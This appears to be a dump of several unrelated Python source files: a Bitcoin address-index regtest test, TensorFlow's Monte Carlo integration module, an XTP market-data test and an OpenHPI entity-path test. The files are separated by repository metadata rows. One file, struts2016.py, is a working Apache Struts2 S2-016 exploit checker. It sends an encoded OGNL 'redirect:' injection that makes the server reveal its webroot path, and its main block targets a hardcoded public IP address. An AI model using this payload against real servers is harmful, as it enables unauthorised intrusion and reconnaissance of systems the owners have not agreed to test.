assert_equal(multitxids[3], txidb1)
assert_equal(multitxids[4], txid2)
assert_equal(multitxids[5], txidb2)
# Check that balances are correct
balance0 = self.nodes[1].getaddressbalance("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br")
assert_equal(balance0["balance"], 45 * 100000000)
# Check that outputs with the same address will only return one txid
print "Testing for txid uniqueness..."
addressHash = "6349a418fc4578d10a372b54b45c280cc8c4382f".decode("hex")
scriptPubKey = CScript([OP_HASH160, addressHash, OP_EQUAL])
unspent = self.nodes[0].listunspent()
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent[0]["txid"], 16), unspent[0]["vout"]))]
tx.vout = [CTxOut(10, scriptPubKey), CTxOut(11, scriptPubKey)]
tx.rehash()
signed_tx = self.nodes[0].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
sent_txid = self.nodes[0].sendrawtransaction(signed_tx["hex"], True)
self.nodes[0].generate(1)
self.sync_all()
txidsmany = self.nodes[1].getaddresstxids("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br")
assert_equal(len(txidsmany), 4)
assert_equal(txidsmany[3], sent_txid)
# Check that balances are correct
print "Testing balances..."
balance0 = self.nodes[1].getaddressbalance("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br")
assert_equal(balance0["balance"], 45 * 100000000 + 21)
# Check that balances are correct after spending
print "Testing balances after spending..."
privkey2 = "cSdkPxkAjA4HDr5VHgsebAPDEh9Gyub4HK8UJr2DFGGqKKy4K5sG"
address2 = "mgY65WSfEmsyYaYPQaXhmXMeBhwp4EcsQW"
addressHash2 = "0b2f0a0c31bfe0406b0ccc1381fdbe311946dadc".decode("hex")
scriptPubKey2 = CScript([OP_DUP, OP_HASH160, addressHash2, OP_EQUALVERIFY, OP_CHECKSIG])
self.nodes[0].importprivkey(privkey2)
unspent = self.nodes[0].listunspent()
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent[0]["txid"], 16), unspent[0]["vout"]))]
amount = unspent[0]["amount"] * 100000000
tx.vout = [CTxOut(amount, scriptPubKey2)]
tx.rehash()
signed_tx = self.nodes[0].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
spending_txid = self.nodes[0].sendrawtransaction(signed_tx["hex"], True)
self.nodes[0].generate(1)
self.sync_all()
balance1 = self.nodes[1].getaddressbalance(address2)
assert_equal(balance1["balance"], amount)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(spending_txid, 16), 0))]
send_amount = 1 * 100000000 + 12840
change_amount = amount - send_amount - 10000
tx.vout = [CTxOut(change_amount, scriptPubKey2), CTxOut(send_amount, scriptPubKey)]
tx.rehash()
signed_tx = self.nodes[0].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
sent_txid = self.nodes[0].sendrawtransaction(signed_tx["hex"], True)
self.nodes[0].generate(1)
self.sync_all()
balance2 = self.nodes[1].getaddressbalance(address2)
assert_equal(balance2["balance"], change_amount)
# Check that deltas are returned correctly
deltas = self.nodes[1].getaddressdeltas({"addresses": [address2], "start": 1, "end": 200})
balance3 = 0
for delta in deltas:
balance3 += delta["satoshis"]
assert_equal(balance3, change_amount)
assert_equal(deltas[0]["address"], address2)
assert_equal(deltas[0]["blockindex"], 1)
# Check that entire range will be queried
deltasAll = self.nodes[1].getaddressdeltas({"addresses": [address2]})
assert_equal(len(deltasAll), len(deltas))
# Check that deltas can be returned from range of block heights
deltas = self.nodes[1].getaddressdeltas({"addresses": [address2], "start": 113, "end": 113})
assert_equal(len(deltas), 1)
# Check that unspent outputs can be queried
print "Testing utxos..."
utxos = self.nodes[1].getaddressutxos({"addresses": [address2]})
assert_equal(len(utxos), 1)
assert_equal(utxos[0]["satoshis"], change_amount)
# Check that indexes will be updated with a reorg
print "Testing reorg..."
best_hash = self.nodes[0].getbestblockhash()
self.nodes[0].invalidateblock(best_hash)
self.nodes[1].invalidateblock(best_hash)
self.nodes[2].invalidateblock(best_hash)
self.nodes[3].invalidateblock(best_hash)
self.sync_all()
balance4 = self.nodes[1].getaddressbalance(address2)
assert_equal(balance4, balance1)
utxos2 = self.nodes[1].getaddressutxos({"addresses": [address2]})
assert_equal(len(utxos2), 1)
assert_equal(utxos2[0]["satoshis"], amount)
# Check sorting of utxos
self.nodes[2].generate(150)
txidsort1 = self.nodes[2].sendtoaddress(address2, 50)
self.nodes[2].generate(1)
txidsort2 = self.nodes[2].sendtoaddress(address2, 50)
self.nodes[2].generate(1)
self.sync_all()
utxos3 = self.nodes[1].getaddressutxos({"addresses": [address2]})
assert_equal(len(utxos3), 3)
assert_equal(utxos3[0]["height"], 114)
assert_equal(utxos3[1]["height"], 264)
assert_equal(utxos3[2]["height"], 265)
# Check mempool indexing
print "Testing mempool indexing..."
privKey3 = "cVfUn53hAbRrDEuMexyfgDpZPhF7KqXpS8UZevsyTDaugB7HZ3CD"
address3 = "mw4ynwhS7MmrQ27hr82kgqu7zryNDK26JB"
addressHash3 = "aa9872b5bbcdb511d89e0e11aa27da73fd2c3f50".decode("hex")
scriptPubKey3 = CScript([OP_DUP, OP_HASH160, addressHash3, OP_EQUALVERIFY, OP_CHECKSIG])
address4 = "2N8oFVB2vThAKury4vnLquW2zVjsYjjAkYQ"
scriptPubKey4 = CScript([OP_HASH160, addressHash3, OP_EQUAL])
unspent = self.nodes[2].listunspent()
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent[0]["txid"], 16), unspent[0]["vout"]))]
amount = unspent[0]["amount"] * 100000000
tx.vout = [CTxOut(amount, scriptPubKey3)]
tx.rehash()
signed_tx = self.nodes[2].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
memtxid1 = self.nodes[2].sendrawtransaction(signed_tx["hex"], True)
time.sleep(2)
tx2 = CTransaction()
tx2.vin = [CTxIn(COutPoint(int(unspent[1]["txid"], 16), unspent[1]["vout"]))]
amount = unspent[1]["amount"] * 100000000
tx2.vout = [
CTxOut(amount / 4, scriptPubKey3),
CTxOut(amount / 4, scriptPubKey3),
CTxOut(amount / 4, scriptPubKey4),
CTxOut(amount / 4, scriptPubKey4)
]
tx2.rehash()
signed_tx2 = self.nodes[2].signrawtransaction(binascii.hexlify(tx2.serialize()).decode("utf-8"))
memtxid2 = self.nodes[2].sendrawtransaction(signed_tx2["hex"], True)
time.sleep(2)
mempool = self.nodes[2].getaddressmempool({"addresses": [address3]})
assert_equal(len(mempool), 3)
assert_equal(mempool[0]["txid"], memtxid1)
assert_equal(mempool[0]["address"], address3)
assert_equal(mempool[0]["index"], 0)
assert_equal(mempool[1]["txid"], memtxid2)
assert_equal(mempool[1]["index"], 0)
assert_equal(mempool[2]["txid"], memtxid2)
assert_equal(mempool[2]["index"], 1)
self.nodes[2].generate(1);
self.sync_all();
mempool2 = self.nodes[2].getaddressmempool({"addresses": [address3]})
assert_equal(len(mempool2), 0)
tx = CTransaction()
tx.vin = [
CTxIn(COutPoint(int(memtxid2, 16), 0)),
CTxIn(COutPoint(int(memtxid2, 16), 1))
]
tx.vout = [CTxOut(amount / 2 - 10000, scriptPubKey2)]
tx.rehash()
self.nodes[2].importprivkey(privKey3)
signed_tx3 = self.nodes[2].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
memtxid3 = self.nodes[2].sendrawtransaction(signed_tx3["hex"], True)
time.sleep(2)
mempool3 = self.nodes[2].getaddressmempool({"addresses": [address3]})
assert_equal(len(mempool3), 2)
assert_equal(mempool3[0]["prevtxid"], memtxid2)
assert_equal(mempool3[0]["prevout"], 0)
assert_equal(mempool3[1]["prevtxid"], memtxid2)
assert_equal(mempool3[1]["prevout"], 1)
# sending and receiving to the same address
privkey1 = "cQY2s58LhzUCmEXN8jtAp1Etnijx78YRZ466w4ikX1V4UpTpbsf8"
address1 = "myAUWSHnwsQrhuMWv4Br6QsCnpB41vFwHn"
address1hash = "c192bff751af8efec15135d42bfeedf91a6f3e34".decode("hex")
address1script = CScript([OP_DUP, OP_HASH160, address1hash, OP_EQUALVERIFY, OP_CHECKSIG])
self.nodes[0].sendtoaddress(address1, 10)
self.nodes[0].generate(1)
self.sync_all()
utxos = self.nodes[1].getaddressutxos({"addresses": [address1]})
assert_equal(len(utxos), 1)
tx = CTransaction()
tx.vin = [
CTxIn(COutPoint(int(utxos[0]["txid"], 16), utxos[0]["outputIndex"]))
]
amount = utxos[0]["satoshis"] - 1000
tx.vout = [CTxOut(amount, address1script)]
tx.rehash()
self.nodes[0].importprivkey(privkey1)
signed_tx = self.nodes[0].signrawtransaction(binascii.hexlify(tx.serialize()).decode("utf-8"))
mem_txid = self.nodes[0].sendrawtransaction(signed_tx["hex"], True)
self.sync_all()
mempool_deltas = self.nodes[2].getaddressmempool({"addresses": [address1]})
assert_equal(len(mempool_deltas), 2)
# Include chaininfo in results
print "Testing results with chain info..."
deltas_with_info = self.nodes[1].getaddressdeltas({
"addresses": [address2],
"start": 1,
"end": 200,
"chainInfo": True
})
start_block_hash = self.nodes[1].getblockhash(1);
end_block_hash = self.nodes[1].getblockhash(200);
assert_equal(deltas_with_info["start"]["height"], 1)
assert_equal(deltas_with_info["start"]["hash"], start_block_hash)
assert_equal(deltas_with_info["end"]["height"], 200)
assert_equal(deltas_with_info["end"]["hash"], end_block_hash)
utxos_with_info = self.nodes[1].getaddressutxos({"addresses": [address2], "chainInfo": True})
expected_tip_block_hash = self.nodes[1].getblockhash(267);
assert_equal(utxos_with_info["height"], 267)
assert_equal(utxos_with_info["hash"], expected_tip_block_hash)
print "Passed\n"
if __name__ == '__main__':
AddressIndexTest().main()
| [
"[email protected]"
] | |
735d9569094b48a1a43aa0a6385db04c3775a9d5 | 29b5345df054c92fd7bdc116d5ddd326c024f4e3 | /tensorflow/contrib/bayesflow/python/ops/monte_carlo.py | dbfa3611ba0962322f06e5219c7feb2b6087cd24 | [
"Apache-2.0"
] | permissive | RMORIOKA/tensorflow | 13beebfd9a7a64e32e52933f08fe1387b1147876 | 6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6 | refs/heads/master | 2022-11-01T01:41:42.914151 | 2016-11-18T16:20:41 | 2016-11-18T16:20:41 | 74,143,763 | 0 | 1 | Apache-2.0 | 2022-10-08T00:42:05 | 2016-11-18T15:50:00 | C++ | UTF-8 | Python | false | false | 11,628 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Monte Carlo integration and helpers.
## Background
Monte Carlo integration refers to the practice of estimating an expectation with
a sample mean. For example, given random variable `Z in R^k` with density `p`,
the expectation of function `f` can be approximated like:
```
E_p[f(Z)] = \int f(z) p(z) dz
~ S_n
:= n^{-1} \sum_{i=1}^n f(z_i), z_i iid samples from p.
```
If `E_p[|f(Z)|] < infinity`, then `S_n --> E_p[f(Z)]` by the strong law of large
numbers. If `E_p[f(Z)^2] < infinity`, then `S_n` is asymptotically normal with
variance `Var[f(Z)] / n`.
Practitioners of Bayesian statistics often find themselves wanting to estimate
`E_p[f(Z)]` when the distribution `p` is known only up to a constant. For
example, the joint distribution `p(z, x)` may be known, but the evidence
`p(x) = \int p(z, x) dz` may be intractable. In that case, a parameterized
distribution family `q_lambda(z)` may be chosen, and the optimal `lambda` is the
one minimizing the KL divergence between `q_lambda(z)` and
`p(z | x)`. We only know `p(z, x)`, but that is sufficient to find `lambda`.
## Log-space evaluation and subtracting the maximum.
Care must be taken when the random variable lives in a high dimensional space.
For example, the naive importance sample estimate `E_q[f(Z) p(Z) / q(Z)]`
involves the ratio of two terms `p(Z) / q(Z)`, each of which must have tails
dropping off faster than `O(|z|^{-(k + 1)})` in order to have finite integral.
This ratio would often be zero or infinity up to numerical precision.
For that reason, we write
```
Log E_q[ f(Z) p(Z) / q(Z) ]
= Log E_q[ exp{Log[f(Z)] + Log[p(Z)] - Log[q(Z)] - C} ] + C, where
C := Max[ Log[f(Z)] + Log[p(Z)] - Log[q(Z)] ].
```
The maximum value of the exponentiated term will be 0.0, and the the expectation
can be evaluated in a stable manner.
## Ops
@@expectation
@@expectation_importance_sampler
@@expectation_importance_sampler_logspace
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
__all__ = [
'expectation',
'expectation_importance_sampler',
'expectation_importance_sampler_logspace',
]
def expectation_importance_sampler(f,
log_p,
sampling_dist_q,
z=None,
n=None,
seed=None,
name='expectation_importance_sampler'):
r"""Monte Carlo estimate of `E_p[f(Z)] = E_q[f(Z) p(Z) / q(Z)]`.
With `p(z) := exp{log_p(z)}`, this `Op` returns
```
n^{-1} sum_{i=1}^n [ f(z_i) p(z_i) / q(z_i) ], z_i ~ q,
\approx E_q[ f(Z) p(Z) / q(Z) ]
= E_p[f(Z)]
```
This integral is done in log-space with max-subtraction to better handle the
often extreme values that `f(z) p(z) / q(z)` can take on.
If `f >= 0`, it is up to 2x more efficient to exponentiate the result of
`expectation_importance_sampler_logspace` applied to `Log[f]`.
User supplies either `Output` of samples `z`, or number of samples to draw `n`
Args:
f: Callable mapping samples from `sampling_dist_q` to `Output`s with shape
broadcastable to `q.batch_shape`.
For example, `f` works "just like" `q.log_prob`.
log_p: Callable mapping samples from `sampling_dist_q` to `Output`s with
shape broadcastable to `q.batch_shape`.
For example, `log_p` works "just like" `sampling_dist_q.log_prob`.
sampling_dist_q: The sampling distribution.
`tf.contrib.distributions.Distribution`.
`float64` `dtype` recommended.
`log_p` and `q` should be supported on the same set.
z: `Output` of samples from `q`, produced by `q.sample_n`.
n: Integer `Output`. Number of samples to generate if `z` is not provided.
seed: Python integer to seed the random number generator.
name: A name to give this `Op`.
Returns:
The importance sampling estimate. `Output` with `shape` equal
to batch shape of `q`, and `dtype` = `q.dtype`.
"""
q = sampling_dist_q
with ops.name_scope(name, values=[z, n]):
z = _get_samples(q, z, n, seed)
log_p_z = log_p(z)
q_log_prob_z = q.log_prob(z)
def _importance_sampler_positive_f(log_f_z):
# Same as expectation_importance_sampler_logspace, but using Tensors
# rather than samples and functions. Allows us to sample once.
log_values = log_f_z + log_p_z - q_log_prob_z
return _logspace_mean(log_values)
# With f_plus(z) = max(0, f(z)), f_minus(z) = max(0, -f(z)),
# E_p[f(Z)] = E_p[f_plus(Z)] - E_p[f_minus(Z)]
# = E_p[f_plus(Z) + 1] - E_p[f_minus(Z) + 1]
# Without incurring bias, 1 is added to each to prevent zeros in logspace.
# The logarithm is approximately linear around 1 + epsilon, so this is good
# for small values of 'z' as well.
f_z = f(z)
log_f_plus_z = math_ops.log(nn.relu(f_z) + 1.)
log_f_minus_z = math_ops.log(nn.relu(-1. * f_z) + 1.)
log_f_plus_integral = _importance_sampler_positive_f(log_f_plus_z)
log_f_minus_integral = _importance_sampler_positive_f(log_f_minus_z)
return math_ops.exp(log_f_plus_integral) - math_ops.exp(log_f_minus_integral)
def expectation_importance_sampler_logspace(
log_f,
log_p,
sampling_dist_q,
z=None,
n=None,
seed=None,
name='expectation_importance_sampler_logspace'):
r"""Importance sampling with a positive function, in log-space.
With `p(z) := exp{log_p(z)}`, and `f(z) = exp{log_f(z)}`, this `Op`
returns
```
Log[ n^{-1} sum_{i=1}^n [ f(z_i) p(z_i) / q(z_i) ] ], z_i ~ q,
\approx Log[ E_q[ f(Z) p(Z) / q(Z) ] ]
= Log[E_p[f(Z)]]
```
This integral is done in log-space with max-subtraction to better handle the
often extreme values that `f(z) p(z) / q(z)` can take on.
In contrast to `expectation_importance_sampler`, this `Op` returns values in
log-space.
User supplies either `Output` of samples `z`, or number of samples to draw `n`
Args:
log_f: Callable mapping samples from `sampling_dist_q` to `Output`s with
shape broadcastable to `q.batch_shape`.
For example, `log_f` works "just like" `sampling_dist_q.log_prob`.
log_p: Callable mapping samples from `sampling_dist_q` to `Output`s with
shape broadcastable to `q.batch_shape`.
For example, `log_p` works "just like" `q.log_prob`.
sampling_dist_q: The sampling distribution.
`tf.contrib.distributions.Distribution`.
`float64` `dtype` recommended.
`log_p` and `q` should be supported on the same set.
z: `Output` of samples from `q`, produced by `q.sample_n`.
n: Integer `Output`. Number of samples to generate if `z` is not provided.
seed: Python integer to seed the random number generator.
name: A name to give this `Op`.
Returns:
Logarithm of the importance sampling estimate. `Output` with `shape` equal
to batch shape of `q`, and `dtype` = `q.dtype`.
"""
q = sampling_dist_q
with ops.name_scope(name, values=[z, n]):
z = _get_samples(q, z, n, seed)
log_values = log_f(z) + log_p(z) - q.log_prob(z)
return _logspace_mean(log_values)
def _logspace_mean(log_values):
"""Evaluate `Log[E[values]]` in a stable manner.
Args:
log_values: `Output` holding `Log[values]`.
Returns:
`Output` of same `dtype` as `log_values`, reduced across dim 0.
`Log[Mean[values]]`.
"""
# center = Max[Log[values]], with stop-gradient
# The center hopefully keep the exponentiated term small. It is cancelled
# from the final result, so putting stop gradient on it will not change the
# final result. We put stop gradient on to eliminate unnecessary computation.
center = array_ops.stop_gradient(_sample_max(log_values))
# centered_values = exp{Log[values] - E[Log[values]]}
centered_values = math_ops.exp(log_values - center)
# log_mean_of_values = Log[ E[centered_values] ] + center
# = Log[ E[exp{log_values - E[log_values]}] ] + center
# = Log[E[values]] - E[log_values] + center
# = Log[E[values]]
log_mean_of_values = math_ops.log(_sample_mean(centered_values)) + center
return log_mean_of_values
def expectation(f, p, z=None, n=None, seed=None, name='expectation'):
r"""Monte Carlo estimate of an expectation: `E_p[f(Z)]` with sample mean.
This `Op` returns
```
n^{-1} sum_{i=1}^n f(z_i), where z_i ~ p
\approx E_p[f(Z)]
```
User supplies either `Output` of samples `z`, or number of samples to draw `n`
Args:
f: Callable mapping samples from `p` to `Output`s.
p: `tf.contrib.distributions.Distribution`.
z: `Output` of samples from `p`, produced by `p.sample_n`.
n: Integer `Output`. Number of samples to generate if `z` is not provided.
seed: Python integer to seed the random number generator.
name: A name to give this `Op`.
Returns:
An `Output` with the same `dtype` as `p`.
Example:
```python
N_samples = 10000
distributions = tf.contrib.distributions
dist = distributions.Uniform([0.0, 0.0], [1.0, 2.0])
elementwise_mean = lambda x: x
mean_sum = lambda x: tf.reduce_sum(x, 1)
estimate_elementwise_mean_tf = monte_carlo.expectation(elementwise_mean,
dist,
n=N_samples)
estimate_mean_sum_tf = monte_carlo.expectation(mean_sum,
dist,
n=N_samples)
with tf.Session() as sess:
estimate_elementwise_mean, estimate_mean_sum = (
sess.run([estimate_elementwise_mean_tf, estimate_mean_sum_tf]))
print estimate_elementwise_mean
>>> np.array([ 0.50018013 1.00097895], dtype=np.float32)
print estimate_mean_sum
>>> 1.49571
```
"""
with ops.name_scope(name, values=[n, z]):
z = _get_samples(p, z, n, seed)
return _sample_mean(f(z))
def _sample_mean(values):
"""Mean over sample indices. In this module this is always [0]."""
return math_ops.reduce_mean(values, reduction_indices=[0])
def _sample_max(values):
"""Max over sample indices. In this module this is always [0]."""
return math_ops.reduce_max(values, reduction_indices=[0])
def _get_samples(dist, z, n, seed):
"""Check args and return samples."""
with ops.name_scope('get_samples', values=[z, n]):
if (n is None) == (z is None):
raise ValueError(
'Must specify exactly one of arguments "n" and "z". Found: '
'n = %s, z = %s' % (n, z))
if n is not None:
return dist.sample_n(n=n, seed=seed)
else:
return ops.convert_to_tensor(z, name='z')
| [
"[email protected]"
] | |
f18e2900ad229eb69539225ff1271712780b26b1 | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/Quote18/HQ_18_042.py | 4520798521b4e456949b24bbd5c72a4af4a40a7b | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,258 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import time
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from log import *
class HQ_18_042(xtp_test_case):
def subMarketData(self, Api, stk_info, case_name, rs_expect):
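        # Subscribe to market data for stk_info and hand the API's error result to print_msg for comparison with rs_expect.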
print Api.GetApiVersion()
def on_market_data(data, error, last):
self.print_msg(case_name, rs_expect, error)
Api.setSubMarketDataHandle(on_market_data)
Api.SubscribeMarketData(stk_info)
time.sleep(1)
def print_msg(self, case_name, rs_expect, error):
if rs_expect == error:
logger.warning('{0}测试正确!'.format(case_name))
else:
logger.error('{0}测试错误!'.format(case_name))
self.assertEqual(error, rs_expect)
def test_HQ_18_042(self):
pyname = 'HQ_18_042'
client_id = 6
Api = XTPQuoteApi(client_id)
Api.Login()
stk_info = {'ticker': '', 'exchange_id': 1}
self.subMarketData(Api, stk_info, pyname,
{'error_id': 11200003, 'error_msg': 'unknown security'}) # 0
Api.Logout()
if __name__=='__main__':
unittest.main()
| [
"[email protected]"
] | |
c8e514cf6371ba34c6915c2a4fa7d98162c04ef5 | 387ad3775fad21d2d8ffa3c84683d9205b6e697d | /testsuite/trunk/epath/set_ep_loc_012.py | 78a9160027aee4ca102953bb975b8d0cbcdb9901 | [] | no_license | kodiyalashetty/test_iot | 916088ceecffc17d2b6a78d49f7ea0bbd0a6d0b7 | 0ae3c2ea6081778e1005c40a9a3f6d4404a08797 | refs/heads/master | 2020-03-22T11:53:21.204497 | 2018-03-09T01:43:41 | 2018-03-09T01:43:41 | 140,002,491 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,928 | py | #!/usr/bin/env python
"""
(C) Copyright IBM Corp. 2008
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. This
file and program are licensed under a BSD style license. See
the Copying file included with the OpenHPI distribution for
full licensing terms.
Authors:
Suntrupth S Yadav <[email protected]>
"""
"""oh_set_ep_location: Dull entity path and victim element in the middle.
Only victim element's instance number changed. """
import unittest
from openhpi import *
class TestSequence(unittest.TestCase):
def runTest(self):
y = 77002
z = 3
i = 0
ep=SaHpiEntityPathT()
#SaHpiEntityTypeT
w = SAHPI_ENT_SBC_BLADE
#SaHpiEntityLocationT
x = 56873
for i in range(0,z):
ep.Entry[i].EntityType = w
ep.Entry[i].EntityLocation = y
i=i+1
ep.Entry[z].EntityType = SAHPI_ENT_FAN
ep.Entry[z].EntityLocation = z
for i in range(z+1, SAHPI_MAX_ENTITY_PATH):
ep.Entry[i].EntityType = w
ep.Entry[i].EntityLocation = y
i=i+1
err = oh_set_ep_location(ep, SAHPI_ENT_FAN, x)
self.assertEqual (err!=None,True)
self.assertEqual (ep.Entry[z].EntityLocation != x,False)
self.assertEqual (ep.Entry[z].EntityType != SAHPI_ENT_FAN,False)
for i in range ( 0,z ):
self.assertEqual ((ep.Entry[i].EntityType != w) or
(ep.Entry[i].EntityLocation != y),False)
i=i+1
for i in range ( z+1, SAHPI_MAX_ENTITY_PATH):
self.assertEqual ((ep.Entry[i].EntityType != w) or
(ep.Entry[i].EntityLocation != y),False)
if __name__=='__main__':
unittest.main()
| [
"suntrupth@a44bbd40-eb13-0410-a9b2-f80f2f72fa26"
] | suntrupth@a44bbd40-eb13-0410-a9b2-f80f2f72fa26 |
b257b9fbad4c6e99eb47fc7e4b63508036ae8fe7 | 6257b3d146ecff251aabb4dc78cf66bc69d2ab31 | /component/struts/struts2016.py | 980725069fe7fafe8cd96a756da7fe407fcc2015 | [
"MIT"
] | permissive | bigbigx/PocCollect | 39549107f01d313656b451bafe7657cb8c61f410 | 6b0f438e6e6005bd0adbdf3bcc97a2d808c6f9ea | refs/heads/master | 2021-06-04T15:48:04.790219 | 2021-04-06T11:24:54 | 2021-04-06T11:24:54 | 63,687,713 | 0 | 0 | MIT | 2021-04-06T11:24:55 | 2016-07-19T11:19:43 | Python | UTF-8 | Python | false | false | 2,355 | py | #!/usr/bin/env python
# encoding: utf-8
from t import T
import requests
class P(T):
def __init__(self):
T.__init__(self)
keywords=['struts']
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
target_url=''
target_url = 'http://' + ip + ':' + port
if productname.get('path',''):
target_url = 'http://'+ip+':'+port+productname.get('path','')
else:
from script import linktool
listarray=linktool.getaction(target_url)
if len(listarray)>0:
target_url=listarray[0]
else:
target_url = 'http://'+ip+':'+port+'/login.action'
result = {}
timeout=3
result['result']=False
res=None
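        # The OGNL "redirect:" payload below makes the server echo a marker plus its webroot path;
        # finding the marker ("88888887") in the response body marks the target as vulnerable.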
payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
print target_url
try:
headers = {"Content-Type":"application/x-www-form-urlencoded"}
res = requests.post(target_url,data=payload,headers=headers,timeout=5)  # assign to res so the finally block below can close it
res_html = res.text
except Exception,e:
print e
return result
finally:
if res is not None:
res.close()
del res
if res_html.find("88888887") <> -1:
info = target_url + "struts016 Vul"
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='struts016 Vul'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload']=payload
result['VerifyInfo']['result'] =info
return result
return result
if __name__ == '__main__':
print P().verify(ip='116.213.171.228',port='80')
| [
"[email protected]"
] | |
8110ddd0dde5af6e6d8fb80a917983c1ae137518 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /hoxv8zaQJNMWJqnt3_1.py | 111f3aa56f45f561eaf1e5c385c12cc977867642 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py |
def is_heteromecic(n,i = 0):
if n == i * (i + 1):
return True
if n < i * (i +1):
return False
i+=1
return is_heteromecic(n, i)
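# A quick illustrative check (not part of the original submission): 12 = 3 * 4 is
# heteromecic (pronic), while 10 falls between 2 * 3 and 3 * 4, so:
#   is_heteromecic(12)  ->  True
#   is_heteromecic(10)  ->  False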
| [
"[email protected]"
] | |
0a1045f155f346fcd6be4db7820ecffde97a490b | eef285b8c4530a7dc1187e08292bf246e3732915 | /chat_project/chat_backend/chat_backend/user/admin.py | 24c2b5b4d4948b6624de91964a94edf55e80a494 | [] | no_license | wlgud0402/making_projects | 32ba45817e48c3d21b174c823177d96af10d9a20 | 6d86d09c61eb70339423f33d6e42ca0cdff391a6 | refs/heads/master | 2023-03-21T09:45:25.600251 | 2021-03-22T13:02:26 | 2021-03-22T13:02:26 | 338,810,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | from django.contrib import admin
from .models import User
# Register your models here.
# admin.site.register(User)
@admin.register(User)
class UserAdmin(admin.ModelAdmin):
list_display = ('email', 'nickname', 'user_type', 'room_id', 'created_at',)
| [
"[email protected]"
] | |
17ca38843edb8b4672e8f653c45f1cec4881a059 | f7ff0b17e010abb7a2545e6583b8210959861a10 | /jupytext/version.py | aafb0cd4af6aefaa1dcb2cfdbae7b1294f5092d0 | [
"MIT"
] | permissive | IanEdington/jupytext | d0b7f61c69ad003eea5fd77283a1b47f689351d3 | bc1b15935e096c280b6630f45e65c331f04f7d9c | refs/heads/master | 2022-11-06T19:51:17.822602 | 2020-06-23T20:59:08 | 2020-06-25T12:37:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59 | py | """Jupytext's version number"""
__version__ = "1.5.1-dev"
| [
"[email protected]"
] | |
5df7bbb123a2779a847aa9762e9a98f01c792d2e | ce55c319f5a78b69fefc63595d433864a2e531b5 | /前端+数据分析/套接字/闭包.py | 3471e3e269632f386dfa8ff19ab2bb59ac4d02c1 | [] | no_license | Suijng/1809_data | a072c875e8746190e3b715e53f1afe3323f4666b | 45f8a57089f5c30ccc1a3cddb03b76dc95355417 | refs/heads/master | 2022-12-21T12:38:30.458291 | 2019-09-27T01:14:41 | 2019-09-27T01:14:41 | 211,207,071 | 0 | 0 | null | 2022-11-22T03:16:18 | 2019-09-27T00:55:21 | HTML | UTF-8 | Python | false | false | 89 | py | x = 300
def test1():
x = 200
def test2():
global x
print('--1--') | [
"[email protected]"
] | |
a81fb81b960fc04f18e1042929aa6c944cfb1007 | 8acffb8c4ddca5bfef910e58d3faa0e4de83fce8 | /ml-flask/Lib/site-packages/networkx/algorithms/flow/capacityscaling.py | 9a6a5c7270f10e7645babe83c8286a14cb73b66f | [
"MIT"
